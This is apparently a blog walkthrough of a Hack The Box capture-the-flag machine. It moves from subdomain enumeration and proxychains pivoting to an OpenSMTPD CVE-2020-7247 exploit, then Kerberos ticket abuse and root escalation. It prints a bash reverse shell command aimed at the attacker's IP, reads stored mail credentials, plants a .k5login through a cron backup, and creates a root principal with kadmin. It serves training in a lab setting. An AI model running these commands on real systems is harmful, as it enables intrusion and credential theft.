In this post, i would like to share a walkthrough on Tentacle Machine.


This room has been considered difficulty rated as a Hard machine

Information Gathering on Tentacle


Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN


We need to whitelist the domain name for the machine such as REALCORP.HTB


Let’s open the browser and straight into the website interface.


Let’s try to enumerate more on the website by using the command gobuster dns -d <url> -w /SecLists/Discovery/DNS/subdomains-top1million-11000.txt


No result output has been shown over here.


Let’s try a different method to get the subdomain of the machine by executing dnsenum –thread 64 –dnsserver 10.10.10.224 –file /SecLists/Discovery/DNS/subdomains-top1million-11000.txt realcorp.htb


The result of the domain can be seen below:

ns.realcorp.htb                     10.197.243.77
proxy.realcorp.htb.               ns.realcorp.htb
wpad.realcorp.htb                 10.197.243.31

Let’s open the browser and straight into the website interface.


The Website interface shows a 403 Forbidden error which we found nothing useful over here.


However, the subdomain wpad has caught my attention for a while now. Let’s do some research on it.


I have found that WPAD is a short form of Web Proxy Auto-Discovery Protocol which you can read more on WPAD findings over here


When thinking hard, I do remember that there’s a tool called proxy chains to enumerate more on the machine.

Gaining Access to Tentacle machine


For those who are not familiar with proxy chains, we can read more on the tools over here


We need to install proxychains4 by executing sudo apt-get install proxychains4. In my case, the tools have been installed before.


We can see if the proxychains4 has been successfully installed in the machine by running the command proxychains4 shown in the screenshot above.


We need to configure the /etc/proxychains4.conf with the IP that we found on dnsenum at the bottom of the file

http 10.10.10.224 3128
http 127.0.0.1 3128
http 10.197.243.77 3128

Enumerate with proxy chains on the machine


Let’s do the scanning back with the Nmap command using proxychains4 tools on tentacle machine. The Nmap result came out the same except we found out there’s a new port is open which is 80/tcp open http


The website still appear 403 Forbidden error on the wpad.realcorp.htb


For this enumeration process, we will be using dirsearch.py tools the tool’s purpose would be something such as below


“dirsearch” is a mature command-line tool designed to brute force directories and files in webservers.


From the resulting output, we found out that /wpad.dat is the only file detected during the enumeration process let’s go to the URL wpad.realcorp.htb/wpad.dat to see what is saved on the file


A pop-up asking whether we want to save the file or not into our machine.


When we open the wpad.dat, we notice that the IP address and domain name is been saved on the file in programming format.


We need to find out about other IP addresses besides what we already found now. After a while, we found that there was another new IP Address which is 10.241.251.113


I did some enumeration on the IP Address that we found, and we found out that port 25 is open on the 10.241.251.113


We must start the nc listener on the machine to get the reverse shell connection back to us.


We notice that port 25 is running OpenSMTPD and do some research on it


I found that there’s an exploit on the OpenSMTPD on the internet.

Trying to exploit using cve-2020-7247


There are a lot of usable exploits that can be found on the internet, but I will be using this exploit here to proceed further. We can download the exploit into our machine by executing git clone https://github.com/FiroSolutions/cve-2020-7247-exploit


After i have done studying the exploit, we need to modify the code so that the exploit will work as we planned.


We can execute the exploit by running the command such as below:

proxychains -f /etc/proxychains.conf python3 getshell.py 10.241.251.113 25 'bash -c "exec bash -i &> /dev/tcp/<VPN's IP Address/<PORT> <&1"'

When we investigate our reverse shell terminal, we have the shell back


We found out that we access the machine via root@smtp which find suspicious because too early to get root.


Let’s see on the /root/ directory and we found nothing stored there.

Maintaining Access to the Tentacle machine


We can go to /home/j.nakazawa directory and there’s a file name that caught my attention such as .msmtprc


We can open the .msmtprc file by running the command “cat .msmtprc


Oh wow! We got the credentials such as the user and password that have been shown above.


Let’s access the machine with j.nakazawa credentials via ssh service and unfortunately, we cannot access the machine via ssh service.


Based on the password that has been found on /home/j.nakazawa/.msmtprc, i notice that the password has been saved in Kerberos formatting

Playing with the Kerberos tool on the machine


In my research, i found out that krb5 is included in the Kerberos which we need to install on the machine.


We can install it by using the command sudo apt-get install krb5-user


Once we have successfully downloaded, we need to modify the /etc/krb5.conf by adding the following

default_realm = REALCORP.HTB
REALCORP.HTB = {
        kdc = 10.10.10.224
        }

We also need to add

10.10.10.224 realcorp.htb
10.10.10.224 srv01.realcorp.htb

Honestly, i don’t have any knowledge of how to create a ticket using Kerberos. As a result, let’s do some further research on it


We managed to learn how to create a Kerberos Ticket on this website

Exploiting with kinit and klist function on the machine


We need to create the ticket by using the command kinit j.nakazawa with the password that we found earlier


I can see the available ticket by running the command klist


Let’s try to access the machine via ssh j.nakazawa@realcorp.htb


Sadly, we cannot access the machine with the password found earlier.


Let’s troubleshoot the issues by running the command ssh -v and the error log such as Server krbtgt/HTB@REALCORP.HTB not found in the Kerberos database


I have banged my head multiple times and stuck on the issues for around 12 hours.


After 12 hours stuck on the issues, i have decided to use the config such as 10.10.10.224 srv01.realcorp.htb on the /etc/hosts


Next, we re-try creating the ticket by using kinit j.nakazawa with the password found and klist command.


Let’s try again to access the machine via ssh j.nakazawa@10.10.10.224 and we have finally accessed the machine.


We can read the user flag by going to /home/j.nakazawa directory and use the command “cat user.txt

Escalate to Root Privileges Access on Tentacle machine


Normally, there’s something interesting on /opt/ directory


Let’s go to the /etc/ directory and try to look at whatever can be useful to us to escalate the privileges access.


We found a file called crontab and for those who are not familiar with Linux Operating System, crontab is a table of the list of tasks scheduled to run at regular time intervals on the system


Let’s open the crontab file and we notice there’s a directory at the bottom of the file which leads to /usr/local/bin/log_backup.sh


We can read the log_backup.sh file that is located inside the /usr/local/bin/ directory. While reading the bash file, i notice that everything stored in /var/log/squid will be transferred to /home/admin


Let’s create a file that contains the username of the machine (j.nakazawa@realcorp.htb) and save it as. k5login.


When i try to list down the file and I got an error saying permission denied


Let’s create the same command as previously on /home/j.nakazawa and the file is stored there.


So, let’s copy the .k5login into the /var/log/squid


Let’s try to ssh to admin privileges at srv01.realcorp.htb and it works like charm!


We try to look at what has been stored here and we found two squid log files in this directory

Play with the klist command


We will continue doing some research with the klist command which can be found here


Let’s see the principal that is stored inside the /etc/krb5.keytab by using the command klist -k /etc/krb5.keytab


Some research on kadmin command is found over here


We can create a new principal by executing the following command

kadmin -k -t /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB
add_principal root@REALCORP.HTB

How to escalate to root from here?


We will be learning on ksu command which can be read here


From the article that i read, we need to execute ksu root to escalate to root privileges access. We will be asking for a password where the password is the same as we configure previously during the kadmin command.


We can read the root flag by going to /root/ directory and using the command “cat root.txt”


-THE END-


Happy Learning Guys!

Extra Information on


We can get the root hashes at /etc/shadow which it will be using as the password to read this write-up